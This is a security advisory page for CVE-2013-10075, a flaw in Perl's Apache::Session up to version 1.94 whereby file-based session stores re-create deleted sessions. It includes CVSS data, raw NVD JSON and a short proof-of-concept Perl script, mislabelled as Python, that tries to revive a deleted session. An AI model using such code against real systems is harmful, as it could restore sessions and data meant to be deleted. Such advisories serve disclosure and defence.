Security Vulnerability Report
中文
CVE-2013-10075 CVSS 9.1 CRITICAL

CVE-2013-10075

Published: 2026-05-08 08:16:43
Last Modified: 2026-05-08 19:51:17
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Apache::Session versions through 1.94 for Perl re-creates deleted sessions. The session stores Apache::Session::Store::File and Apache::Session::Store::DB_File will create a session that does not exist. This can lead to sessions being revived, potentially with data that was to be deleted.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:chorny:apache\:\:session:*:*:*:*:*:perl:*:* - VULNERABLE
Apache::Session <= 1.94

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/perl use strict; use warnings; use Apache::Session::File; # Simulating the vulnerability scenario my $deleted_session_id = 'deadbeef_example_id'; my %session; # Directory settings for demo my $dir = '/tmp/sessions'; # Attempt to retrieve a session that supposedly does not exist # In the vulnerable version (<= 1.94), this recreates the session eval { tie %session, 'Apache::Session::File', $deleted_session_id, { Directory => $dir, LockDirectory => $dir }; }; if ($@) { print "Session could not be tied (Safe behavior): $@\n"; } else { print "Vulnerability Exploited: Session $deleted_session_id was revived!\n"; print "Session Data: " . $session{_session_id} . "\n"; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2013-10075", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-08T08:16:43.463", "lastModified": "2026-05-08T19:51:16.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache::Session versions through 1.94 for Perl re-creates deleted sessions.\n\nThe session stores Apache::Session::Store::File and Apache::Session::Store::DB_File will create a session that does not exist. This can lead to sessions being revived, potentially with data that was to be deleted."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-672"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chorny:apache\\:\\:session:*:*:*:*:*:perl:*:*", "versionEndIncluding": "1.94", "matchCriteriaId": "9A53869F-0D98-4DDA-A5FB-1C68E4FA9B1B"}]}]}], "references": [{"url": "https://rt.cpan.org/Public/Bug/Display.html?id=83525", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/08/12", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.